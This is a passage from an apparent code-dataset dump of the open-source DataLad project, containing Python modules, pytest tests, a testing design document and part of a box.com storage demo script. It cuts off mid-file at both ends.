1)\n ]\n\n assert all_results[0] == all_results[1]\n\n\ndef test_thread_leave_handling() -> None:\n # expect no exception on repeated call to run of a runner with\n # generator-protocol, if the generator was exhausted before the second call\n\n thread_1, thread_2, exception = _get_run_on_threads(\n MinimalStdOutGeneratorProtocol,\n True\n )\n\n thread_1.start()\n thread_1.join()\n\n thread_2.start()\n thread_2.join()\n\n assert exception == []\n" }, { "alpha_fraction": 0.5974589586257935, "alphanum_fraction": 0.598078727722168, "avg_line_length": 35.258426666259766, "blob_id": "08f574ca968a8a883dd6fabe240a2f01ff6f986a", "content_id": "949bf87b8ee50bdc708d245772bc220e6976e9f9", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9681, "license_type": "permissive", "max_line_length": 126, "num_lines": 267, "path": "/datalad/local/add_readme.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"add a README file to a dataset\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\n\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import build_doc\nfrom datalad.support.annexrepo import AnnexRepo\n\nlgr = logging.getLogger('datalad.local.add_readme')\n\n\n@build_doc\nclass AddReadme(Interface):\n \"\"\"Add basic information about DataLad datasets to a README file\n\n The README file is added to the dataset and the addition is saved\n in the dataset.\n Note: Make sure that no unsaved modifications to your dataset's\n .gitattributes file exist.\n\n \"\"\"\n from datalad.support.param import Parameter\n from datalad.distribution.dataset import datasetmethod\n from datalad.interface.base import eval_results\n from datalad.distribution.dataset import EnsureDataset\n from datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n )\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"Dataset to add information to. 
If no dataset is given, an\n attempt is made to identify the dataset based on the current\n working directory.\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n filename=Parameter(\n args=(\"filename\",),\n metavar=\"PATH\",\n nargs='?',\n doc=\"\"\"Path of the README file within the dataset.\"\"\",\n constraints=EnsureStr()),\n existing=Parameter(\n args=(\"--existing\",),\n doc=\"\"\"How to react if a file with the target name already exists:\n 'skip': do nothing; 'append': append information to the existing\n file; 'replace': replace the existing file with new content.\"\"\",\n constraints=EnsureChoice(\"skip\", \"append\", \"replace\")),\n )\n\n @staticmethod\n @datasetmethod(name='add_readme')\n @eval_results\n def __call__(filename='README.md',\n *,\n dataset=None,\n existing='skip'):\n from os.path import lexists\n from os.path import join as opj\n from io import open\n\n from datalad.distribution.dataset import require_dataset\n from datalad.utils import ensure_list\n\n dataset = require_dataset(dataset, check_installed=True,\n purpose='add README')\n\n fpath = opj(dataset.path, filename)\n res_kwargs = dict(action='add_readme', path=fpath)\n\n if lexists(fpath) and existing == 'skip':\n yield dict(\n res_kwargs,\n status='notneeded',\n message='file already exists, and not appending content')\n return\n\n # unlock, file could be annexed\n if lexists(fpath):\n yield from dataset.unlock(\n fpath,\n return_type='generator',\n result_renderer='disabled'\n )\n if not lexists(fpath):\n # if we have an annex repo, shall the README go to Git or annex?\n\n if isinstance(dataset.repo, AnnexRepo) \\\n and 'annex.largefiles' not in \\\n dataset.repo.get_gitattributes(filename).get(filename, {}):\n # configure the README to go into Git\n dataset.repo.set_gitattributes(\n [(filename, {'annex.largefiles': 'nothing'})])\n yield from dataset.save(\n path='.gitattributes',\n message=\"[DATALAD] Configure README to be in Git\",\n to_git=True,\n return_type='generator',\n result_renderer='disabled'\n )\n\n # get any metadata on the dataset itself\n meta = _get_dataset_metadata(dataset)\n metainfo = ''\n for label, content in (\n ('', meta.get('description', meta.get('shortdescription', ''))),\n ('Author{}'.format('s' if isinstance(meta.get('author', None), list) else ''),\n u'\\n'.join([u'- {}'.format(a) for a in ensure_list(meta.get('author', []))])),\n ('Homepage', meta.get('homepage', '')),\n ('Reference', meta.get('citation', '')),\n ('License', meta.get('license', '')),\n ('Keywords', u', '.join([u'`{}`'.format(k) for k in ensure_list(meta.get('tag', []))])),\n ('Funding', meta.get('fundedby', '')),\n ):\n if label and content:\n metainfo += u'\\n\\n### {}\\n\\n{}'.format(label, content)\n elif content:\n metainfo += u'\\n\\n{}'.format(content)\n\n for key in 'title', 'name', 'shortdescription':\n if 'title' in meta:\n break\n if key in meta:\n meta['title'] = meta[key]\n\n default_content=u\"\"\"\\\n# {title}{metainfo}\n\n## General information\n\nThis is a DataLad dataset{id}.\n\n## DataLad datasets and how to use them\n\nThis repository is a [DataLad](https://www.datalad.org/) dataset. It provides\nfine-grained data access down to the level of individual files, and allows for\ntracking future updates. In order to use this repository for data retrieval,\n[DataLad](https://www.datalad.org/) is required. 
It is a free and open source\ncommand line tool, available for all major operating systems, and builds up on\nGit and [git-annex](https://git-annex.branchable.com/) to allow sharing,\nsynchronizing, and version controlling collections of large files.\n\nMore information on how to install DataLad and [how to install](http://handbook.datalad.org/en/latest/intro/installation.html)\nit can be found in the [DataLad Handbook](https://handbook.datalad.org/en/latest/index.html).\n\n### Get the dataset\n\nA DataLad dataset can be `cloned` by running\n\n```\ndatalad clone <url>\n```\n\nOnce a dataset is cloned, it is a light-weight directory on your local machine.\nAt this point, it contains only small metadata and information on the identity\nof the files in the dataset, but not actual *content* of the (sometimes large)\ndata files.\n\n### Retrieve dataset content\n\nAfter cloning a dataset, you can retrieve file contents by running\n\n```\ndatalad get <path/to/directory/or/file>\n```\n\nThis command will trigger a download of the files, directories, or subdatasets\nyou have specified.\n\nDataLad datasets can contain other datasets, so called *subdatasets*. If you\nclone the top-level dataset, subdatasets do not yet contain metadata and\ninformation on the identity of files, but appear to be empty directories. In\norder to retrieve file availability metadata in subdatasets, run\n\n```\ndatalad get -n <path/to/subdataset>\n```\n\nAfterwards, you can browse the retrieved metadata to find out about subdataset\ncontents, and retrieve individual files with `datalad get`. If you use\n`datalad get <path/to/subdataset>`, all contents of the subdataset will be\ndownloaded at once.\n\n### Stay up-to-date\n\nDataLad datasets can be updated. The command `datalad update` will *fetch*\nupdates and store them on a different branch (by default\n`remotes/origin/master`). Running\n\n```\ndatalad update --merge\n```\n\nwill *pull* available updates and integrate them in one go.\n\n### Find out what has been done\n\nDataLad datasets contain their history in the ``git log``. 
By running ``git\nlog`` (or a tool that displays Git history) in the dataset or on specific\nfiles, you can find out what has been done to the dataset or to individual\nfiles by whom, and when.\n\"\"\".format(\n title='Dataset \"{}\"'.format(meta['title']) if 'title' in meta else 'About this dataset',\n metainfo=metainfo,\n id=u' (id: {})'.format(dataset.id) if dataset.id else '',\n )\n\n with open(fpath, 'a' if existing == 'append' else 'w', encoding='utf-8') as fp:\n fp.write(default_content)\n yield dict(\n status='ok',\n path=fpath,\n type='file',\n action='add_readme')\n\n yield from dataset.save(\n fpath,\n message='[DATALAD] added README',\n result_filter=None,\n result_xfm=None,\n return_type='generator',\n result_renderer='disabled'\n )\n\n\ndef _get_dataset_metadata(dataset):\n \"\"\"Implement this function to perform metadata reporting for a dataset\n\n This implementation reports no metadata.\n\n Returns\n -------\n dict\n Can contain keys like 'description', 'shortdescription', 'author',\n 'homepage', 'citation', 'license', 'tag', 'fundedby'\n \"\"\"\n\n meta = {}\n if hasattr(dataset, 'metadata'):\n dsinfo = dataset.metadata(\n '.',\n reporton='datasets',\n return_type='item-or-list',\n result_renderer='disabled',\n on_failure='ignore')\n if not isinstance(dsinfo, dict) or dsinfo.get('status', None) != 'ok':\n lgr.warning(\"Could not obtain dataset metadata, proceeding without\")\n else:\n # flatten possibly existing multiple metadata sources\n for src in dsinfo['metadata']:\n if src.startswith('@'):\n # not a source\n continue\n meta.update(dsinfo['metadata'][src])\n return meta\n" }, { "alpha_fraction": 0.6091679930686951, "alphanum_fraction": 0.6118177175521851, "avg_line_length": 40.93333435058594, "blob_id": "1bc54fe59b878be2a3e15b22def8d6c30bbfa526", "content_id": "0d8bf9eed6e3bf7686edcdc0bcecacdb6cd359f0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3774, "license_type": "permissive", "max_line_length": 90, "num_lines": 90, "path": "/datalad/interface/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface definition\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n# ORDER MATTERS FOLKS!\n\n# the following should be series of import definitions for interface implementations\n# that shall be exposed in the Python API and the cmdline interface\n# all interfaces should be associated with (at least) one of the groups below\n# the name of the `_group_*` variable determines the sorting in the command overview\n# alphanum ascending order\n_group_0dataset = (\n 'Essential',\n [\n # source module, source object[, dest. 
cmdline name[, dest python name]]\n # src module can be relative, but has to be relative to the main 'datalad' package\n ('datalad.core.local.create', 'Create'),\n ('datalad.core.local.save', 'Save', 'save'),\n ('datalad.core.local.status', 'Status', 'status'),\n ('datalad.core.distributed.clone', 'Clone'),\n ('datalad.distribution.get', 'Get'),\n ('datalad.core.distributed.push', 'Push', 'push'),\n ('datalad.core.local.run', 'Run', 'run'),\n ('datalad.core.local.diff', 'Diff', 'diff'),\n ])\n\n_group_1siblings = (\n 'Collaborative workflows',\n [\n ('datalad.distributed.create_sibling_github', 'CreateSiblingGithub'),\n ('datalad.distributed.create_sibling_gitlab', 'CreateSiblingGitlab'),\n ('datalad.distributed.create_sibling_gogs', 'CreateSiblingGogs'),\n ('datalad.distributed.create_sibling_gin', 'CreateSiblingGin'),\n ('datalad.distributed.create_sibling_gitea', 'CreateSiblingGitea'),\n ('datalad.distributed.create_sibling_ria', 'CreateSiblingRia'),\n ('datalad.distribution.create_sibling', 'CreateSibling'),\n ('datalad.distribution.siblings', 'Siblings', 'siblings'),\n ('datalad.distribution.update', 'Update'),\n ])\n\n_group_2dataset = (\n 'Dataset operations',\n [\n ('datalad.local.subdatasets', 'Subdatasets'),\n ('datalad.distributed.drop', 'Drop'),\n ('datalad.local.remove', 'Remove'),\n ('datalad.local.addurls', 'Addurls'),\n ('datalad.local.copy_file', 'CopyFile'),\n ('datalad.local.download_url', 'DownloadURL'),\n ('datalad.local.foreach_dataset', 'ForEachDataset', 'foreach-dataset'),\n ('datalad.distribution.install', 'Install'),\n ('datalad.local.rerun', 'Rerun'),\n ('datalad.local.run_procedure', 'RunProcedure'),\n ])\n\n_group_3misc = (\n 'Miscellaneous',\n [\n ('datalad.local.configuration', 'Configuration'),\n ('datalad.local.wtf', 'WTF'),\n ('datalad.local.clean', 'Clean'),\n ('datalad.local.add_archive_content', 'AddArchiveContent'),\n ('datalad.local.add_readme', 'AddReadme'),\n ('datalad.local.export_archive', 'ExportArchive'),\n ('datalad.distributed.export_archive_ora', 'ExportArchiveORA'),\n ('datalad.distributed.export_to_figshare', 'ExportToFigshare'),\n ('datalad.local.no_annex', 'NoAnnex'),\n ('datalad.local.check_dates', 'CheckDates'),\n ('datalad.local.unlock', 'Unlock'),\n ('datalad.distribution.uninstall', 'Uninstall'),\n ])\n\n_group_4plumbing = (\n 'Plumbing',\n [\n ('datalad.distribution.create_test_dataset', 'CreateTestDataset',\n 'create-test-dataset'),\n ('datalad.support.sshrun', 'SSHRun', 'sshrun'),\n ('datalad.interface.shell_completion', 'ShellCompletion', 'shell-completion'),\n ])\n" }, { "alpha_fraction": 0.7380073666572571, "alphanum_fraction": 0.7380073666572571, "avg_line_length": 23.636363983154297, "blob_id": "a5a8e777a20dc524f069a6447941736d031fc767", "content_id": "ee14e680b1015d7a1f2d84074cbdccfa2a1b5204", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 271, "license_type": "permissive", "max_line_length": 64, "num_lines": 11, "path": "/datalad/cli/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"DataLad command line interface\"\"\"\n\n# ATTN!\n# The rest of the code base MUST NOT import from datalad.cli\n# in order to preserve the strict separation of the CLI from the\n# rest.\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nlgr = logging.getLogger('datalad.cli')\n" }, { "alpha_fraction": 0.6226415038108826, "alphanum_fraction": 0.6283839344978333, "avg_line_length": 32.86111068725586, "blob_id": 
"f70e229b6a4b2bf344766c01bb58afad27b35497", "content_id": "2cfdfb5a463eb060775069401c5e6495d2e3d11f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1219, "license_type": "permissive", "max_line_length": 79, "num_lines": 36, "path": "/datalad/distribution/tests/test_dataset_api.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test Dataset class @datasetmethod bindings without possible side effects\nfrom needed otherwise datalad.api imports.\n\nThis one to be effective should be tested first or in isolation from other\ntest files\n\"\"\"\n\nfrom ...tests.utils_pytest import (\n assert_raises,\n with_tempfile,\n)\nfrom ..dataset import Dataset\n\n\n@with_tempfile(mkdir=True)\ndef test_datasetmethod_bound(path=None):\n ds = Dataset(path)\n # should be automagically imported/picked up if not bound already\n assert ds.create # simplest, intfspec only 2 entries\n assert ds.download_url # 3 entries, with dash\n assert ds.create_sibling_github # 3 entries, 2 dashes\n assert ds.drop # some fancy parametrization\n assert ds.get # some fancy parametrization\n # plugins\n assert ds.addurls\n assert ds.wtf\n # if we ask for some really not known API - kaboom\n with assert_raises(AttributeError):\n ds.kaboommethod()\n" }, { "alpha_fraction": 0.6199575662612915, "alphanum_fraction": 0.6251688599586487, "avg_line_length": 32.21154022216797, "blob_id": "6105b15c9f590cdefe0cd92856be1ee807d7e17d", "content_id": "42f6599d4302780e0ae0dd23349d197e27231ec0", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5181, "license_type": "permissive", "max_line_length": 117, "num_lines": 156, "path": "/datalad/local/tests/test_foreach_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test foreach-dataset command\"\"\"\n\nimport os.path as op\nimport sys\nfrom pathlib import Path\n\nimport pytest\n\nfrom datalad.api import create\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_greater,\n assert_in,\n assert_not_in,\n assert_status,\n eq_,\n get_deeply_nested_structure,\n ok_clean_git,\n swallow_outputs,\n with_tempfile,\n)\n\n\ndef _without_command(results):\n \"\"\"A helper to tune up results so that they lack 'command'\n which is guaranteed to differ between different cmd types\n \"\"\"\n out = []\n for r in results:\n r = r.copy()\n r.pop('command')\n out.append(r)\n return out\n\n\n@with_tempfile(mkdir=True)\ndef check_basic_resilience(populator, path=None):\n ds = populator(path)\n ds.save()\n kwargs = dict(recursive=True)\n\n res_external = ds.foreach_dataset(\n [sys.executable, '-c', 'from datalad.distribution.dataset import Dataset; ds=Dataset(\".\"); print(ds.path)'],\n **kwargs)\n 
res_python = ds.foreach_dataset(\"ds.path\", cmd_type='eval', **kwargs)\n\n # a sample python function to pass to foreach\n def get_path(ds, **kwargs):\n return ds.path\n\n res_python_func = ds.foreach_dataset(get_path, **kwargs)\n\n assert_status('ok', res_external)\n assert_status('ok', res_python)\n\n # consistency checks\n eq_(len(res_external), len(res_python))\n eq_(len(res_external), len(res_python_func))\n eq_(_without_command(res_python), _without_command(res_python_func))\n\n # Test correct order for bottom-up vs top-down\n topdown_dss = [ds.path] + ds.subdatasets(result_xfm='paths', bottomup=False, **kwargs)\n eq_(topdown_dss, [_['result'] for _ in res_python])\n\n bottomup_dss = ds.subdatasets(result_xfm='paths', recursive=True, bottomup=True) + [ds.path]\n eq_(bottomup_dss, [_['result'] for _ in ds.foreach_dataset(\"ds.path\", bottomup=True, cmd_type='eval', **kwargs)])\n\n # more radical example - cleanup\n # Make all datasets dirty\n for d in bottomup_dss:\n (Path(d) / \"dirt\").write_text(\"\")\n res_clean = ds.foreach_dataset(['git', 'clean', '-f'], jobs=10, **kwargs)\n assert_status('ok', res_clean)\n # no dirt should be left\n for d in bottomup_dss:\n assert_false((Path(d) / \"dirt\").exists())\n\n if populator is get_deeply_nested_structure:\n ok_clean_git(ds.path, index_modified=[ds.pathobj / 'subds_modified'])\n else:\n ok_clean_git(ds.path)\n\n\[email protected](\"populator\", [\n # empty dataset\n create,\n # ver much not empty dataset\n get_deeply_nested_structure,\n])\ndef test_basic_resilience(populator):\n check_basic_resilience(populator)\n\n\n@with_tempfile(mkdir=True)\ndef check_python_eval(cmd, path):\n ds = Dataset(path).create()\n res = ds.foreach_dataset(cmd, cmd_type='eval')\n eq_(len(res), 1)\n expected_variables = {'ds', 'pwd', 'refds'}\n eq_(expected_variables.intersection(res[0]['result']), expected_variables)\n # besides expected, there could be few more ATM, +5 arbitrarily just to test\n # that we are not leaking too much\n assert_greater(len(expected_variables) + 5, len(res[0]['result']))\n\n\n@with_tempfile(mkdir=True)\ndef check_python_exec(cmd, path):\n ds = Dataset(path).create()\n sub = ds.create('sub') # create subdataset for better coverage etc\n\n # but exec has no result\n res = ds.foreach_dataset(cmd, cmd_type='exec')\n assert_not_in('result', res[0])\n\n # but allows for more complete/interesting setups in which we could import modules etc\n cmd2 = 'import os, sys; print(f\"DIR: {os.linesep.join(dir())}\")'\n with swallow_outputs() as cmo:\n res1 = ds.foreach_dataset(cmd2, output_streams='capture', cmd_type='exec')\n assert_in('ds', res1[0]['stdout'])\n assert_in('sys', res1[0]['stdout'])\n eq_(res1[0]['stderr'], '')\n # default renderer for each dataset\n assert cmo.out.startswith(f'foreach-dataset(ok): {path}')\n assert f'foreach-dataset(ok): {sub.path}' in cmo.out\n\n with swallow_outputs() as cmo:\n res2 = ds.foreach_dataset(cmd2, output_streams='relpath', cmd_type='exec')\n # still have the same res\n assert res1 == res2\n # but we have \"fancier\" output\n assert cmo.out.startswith(f'DIR: ')\n # 2nd half should be identical to 1st half but with lines prefixed with sub/ path\n lines = cmo.out.splitlines()\n half = len(lines) // 2\n assert [op.join('sub', l) for l in lines[:half]] == lines[half:]\n assert 'foreach-dataset(ok)' not in cmo.out\n\n\ndef test_python():\n check_python_eval(\"dir()\")\n check_python_exec(\"dir()\")\n\n def dummy_dir(*args, **kwargs):\n \"\"\"Ensure that we pass all placeholders as kwargs\"\"\"\n assert 
not args\n return kwargs\n\n check_python_eval(dummy_dir) # direct function invocation\n" }, { "alpha_fraction": 0.7329742908477783, "alphanum_fraction": 0.7373175621032715, "avg_line_length": 57.141414642333984, "blob_id": "b43a1b85e2a90075ecaacb259df02c6ef4374c14", "content_id": "bf0319e27896355b1cf7b259c428bb0ff2bf508a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5756, "license_type": "permissive", "max_line_length": 263, "num_lines": 99, "path": "/docs/source/design/testing.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_testing:\n\n**********************************\nContinuous integration and testing\n**********************************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nDataLad is tested using a pytest-based testsuite that is run locally and via continuous integrations setups.\nCode development should ensure that old and new functionality is appropriately tested.\nThe project aims for good unittest coverage (at least 80%).\n\nRunning tests\n=============\n\n\nStarting at the top level with ``datalad/tests``, every module in the package comes with a subdirectory ``tests/``, containing the tests for that portion of the codebase. This structure is meant to simplify (re-)running the tests for a particular module.\nThe test suite is run using\n\n.. code-block:: bash\n\n pip install -e .[tests]\n python -m pytest -c tox.ini datalad\n # or, with coverage reports\n python -m pytest -c tox.ini --cov=datalad datalad\n\nIndividual tests can be run using a path to the test file, followed by two colons and the test name:\n\n.. code-block:: bash\n\n python -m pytest datalad/core/local/tests/test_save.py::test_save_message_file\n\nThe set of to-be-run tests can be further sub-selected with environment variable based configurations that enable tests based on their :ref:`decorators`, or pytest-specific parameters.\nInvoking a test run using ``DATALAD_TESTS_KNOWNFAILURES_PROBE=True pytest datalad``, for example, will run tests marked as known failures whether or not they still fail.\nSee section :ref:`configuration` for all available configurations.\nInvoking a test run using ``DATALAD_TESTS_SSH=1 pytest -m xfail -c tox.ini datalad`` will run only those tests marked as `xfail <https://docs.pytest.org/en/latest/how-to/skipping.html>`_.\n\nLocal setup\n-----------\nLocal test execution usually requires a local installation with all development requirements. It is recommended to either use a `virtualenv <https://virtualenv.pypa.io/en/latest/>`_, or `tox <https://tox.wiki/en/latest/>`_ via a ``tox.ini`` file in the code base.\n\nCI setup\n--------\nAt the moment, Travis-CI, Appveyor, and GitHub Workflows exercise the tests battery for every PR and on the default branch, covering different operating systems, Python versions, and file systems.\nTests should be ran on the oldest, latest, and current stable Python release.\nThe projects uses https://codecov.io for an overview of code coverage.\n\n\nWriting tests\n=============\n\nAdditional functionality is tested by extending existing similar tests with new test cases, or adding new tests to the respective test script of the module. 
Generally, every file `example.py `with datalad code comes with a corresponding `tests/test_example.py`.\nTest helper functions assisting various general and DataLad specific assertions as well the construction of test directories and files can be found in ``datalad/tests/utils_pytest.py``.\n\n.. _decorators:\n\nTest annotations\n----------------\n\n``datalad/tests/utils_pytest.py`` also defines test decorators.\nSome of those are used to annotate tests for various aspects to allow for easy sub-selection via environment variables.\n\n**Speed**: Please annotate tests that take a while to complete with following decorators\n\n* ``@slow`` if test runs over 10 seconds\n* ``@turtle`` if test runs over 120 seconds (those would not typically be ran on CIs)\n\n**Purpose**: Please further annotate tests with a special purpose specifically. As those tests also usually tend to be slower, use in conjunction with ``@slow`` or ``@turtle`` when slow.\n\n* ``@integration`` - tests verifying correct operation with external tools/services beyond git/git-annex\n* ``@usecase`` - represents some (user) use-case, and not necessarily a \"unit-test\" of functionality\n\n**Dysfunction**: If tests are not meant to be run on certain platforms or under certain conditions, ``@known_failure`` or ``@skip`` annotations can be used. Examples include:\n\n* ``@skip``, ``@skip_if_on_windows``, ``@skip_ssh``, ``@skip_wo_symlink_capability``, ``@skip_if_adjusted_branch``, ``@skip_if_no_network``, ``@skip_if_root``\n* ``@knownfailure``, ``@known_failure_windows``, ``known_failure_githubci_win`` or ``known_failure_githubci_osx``\n\n\nMigrating tests from nose to pytest\n===================================\n\nDataLad's test suite has been migrated from `nose <https://nose.readthedocs.io/en/latest/>`_ to `pytest <https://docs.pytest.org/en/latest/contents.html>`_ in the `0.17.0 release <https://github.com/datalad/datalad/releases/tag/0.17.0>`_.\nThis might be relevant for DataLad extensions that still use nose.\n\nFor the time being, ``datalad.tests.utils`` keeps providing ``nose``-based utils, and ``datalad.__init__`` keeps providing nose-based fixtures to not break extensions that still use nose for testing.\nA migration to ``pytest`` is recommended, though.\nTo perform a typical migration of a DataLad extension to use pytest instead of nose, go through the following list:\n\n* keep all the ``assert_*`` and ``ok_`` helpers, but import them from ``datalad.tests.utils_pytest`` instead\n* for ``@with_*`` and other decorators populating positional arguments, convert corresponding posarg to kwarg by adding ``=None``\n* convert all generator-based parametric tests into direct invocations or, preferably, ``@pytest.mark.parametrized`` tests\n* address ``DeprecationWarnings`` in the code. 
Only where desired to test deprecation, add ``@pytest.mark.filterwarnings(\"ignore: BEGINNING OF WARNING\")`` decorator to the test.\n\nFor an example, see a \"migrate to pytest\" PR against ``datalad-deprecated``: `datalad/datalad-deprecated#51 <https://github.com/datalad/datalad-deprecated/pull/51>`_ .\n" }, { "alpha_fraction": 0.5896387100219727, "alphanum_fraction": 0.5937287211418152, "avg_line_length": 32.34090805053711, "blob_id": "53db01d6452235b45dd2a3bd7a84445dc8c1bc94", "content_id": "e852db74dd816bb6d5f8628f8a6e3d3af94766ec", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1467, "license_type": "permissive", "max_line_length": 87, "num_lines": 44, "path": "/datalad/customremotes/tests/test_main.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for the \"main\" driver of the special remotes\"\"\"\n\nimport logging\nimport os\nimport pytest\n\nfrom ..main import main\n\nfrom ..base import AnnexCustomRemote\n\nfrom datalad.tests.utils_pytest import (\n patch,\n swallow_logs,\n swallow_outputs,\n)\nfrom datalad.ui import ui\n\n\ndef test_erroring_out():\n class TooAbstract(AnnexCustomRemote):\n pass\n\n # patch to not let `main` change the ui.backend\n # of the test process (instead of a special remote process it is actually\n # targeting)\n with swallow_logs(new_level=logging.DEBUG) as cml, \\\n swallow_outputs() as cmo:\n with pytest.raises(SystemExit) as cme,\\\n patch.object(ui, \"set_backend\", autospec=True):\n main(args=[], cls=TooAbstract)\n assert cme.value.code == 1\n assert 'passing ERROR to git-annex' in cml.out\n # verify basic correct formatting of string to git-annex\n assert cmo.out.startswith('ERROR ')\n assert os.linesep not in cmo.out.rstrip()\n assert cmo.out.endswith('\\n') # This is the case even on Windows.\n" }, { "alpha_fraction": 0.7846153974533081, "alphanum_fraction": 0.7846153974533081, "avg_line_length": 20.66666603088379, "blob_id": "96c81803cddf4cefe75b5486f7a919891255098d", "content_id": "c1ba919b94d8ff87a41ec099cf336a31154eb02c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 65, "license_type": "permissive", "max_line_length": 26, "num_lines": 3, "path": "/tools/coverage-bin/sitecustomize.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport coverage\ncoverage.process_startup()\n" }, { "alpha_fraction": 0.7729646563529968, "alphanum_fraction": 0.7757296562194824, "avg_line_length": 68.25531768798828, "blob_id": "26b1b3ff6fefb39c7130b57a4ffcacad09addbf5", "content_id": "327e2ad3f588fc4f3368764fa3b3e7c9c006b10e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3255, "license_type": "permissive", "max_line_length": 332, "num_lines": 47, "path": "/docs/casts/boxcom.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"Many people that need to exchange data use cloud storage services.\"\nsay \"One of these services is 'box.com' 
-- they offer similar features as dropbox, but provide more storage for free (10GB at the moment)\"\nsay \"Here is how DataLad can be configured to use box.com for data storage and exchange...\"\n\nsay \"For the purpose of this demo, we'll set up a dataset that contains a 1MB file with some random binary data\"\nrun \"datalad create demo\"\nrun \"cd demo\"\nrun \"datalad run dd if=/dev/urandom of=big.dat bs=1M count=1\"\n\nsay \"Next we configure box.com as a remote storage location, using a git-annex command.\"\nsay \"Git-annex requires the login credentials to be given as environment variables WEBDAV_USERNAME and WEBDAV_PASSWORD. This demo uses a script that hides the real credentials\"\nrun \". ~/box.com_work.sh\"\n\nsay \"Now for the actual box.com configuration.\"\nsay \"Key argument is the access URL: 'team/project_one' is where the data will be stored in the box.com account.\"\nrun \"git annex initremote box.com type=webdav url=https://dav.box.com/dav/team/project_one chunk=50mb encryption=none\"\nsay \"The 'chunk' and 'encryption' arguments further tailor the setup. Files will be automatically split into chunks less than 50MB. This make synchronization faster, and allows for storing really large files. File can be encrypted before upload to prevent access without a secure key -- for this demo we opted to not use encryption\"\n\nsay \"The next step is optional\"\nsay \"We set up a (possibly private) GitHub repo to exchange/synchronize the dataset itself (but not its data). If you just want to have off-site data storage, but no collaboration with others, this is not needed\"\nsay \"For this demo we opt to create the dataset at github.com/datalad/exchange-demo\"\nrun \"datalad create-sibling-github --github-organization datalad --publish-depends box.com --access-protocol ssh exchange-demo\"\nsay \"We configured DataLad to automatically copy data over to box.com when the dataset is published to GitHub, so we can achieve both in one step:\"\n\nrun \"datalad publish --to github big.dat\"\nrun \"git annex whereis\"\nsay \"The data file was automatically copied to box.com\"\n\nsay \"Now let's see how a collaborator could get access to the data(set)\"\nsay \"Anyone with permission to access the dataset on GitHub can install it\"\nrun \"cd ../\"\nrun \"datalad install -s [email protected]:datalad/exchange-demo.git fromgh\"\n\nsay \"DataLad has reported the presence of a storage sibling 'box.com'\"\nsay 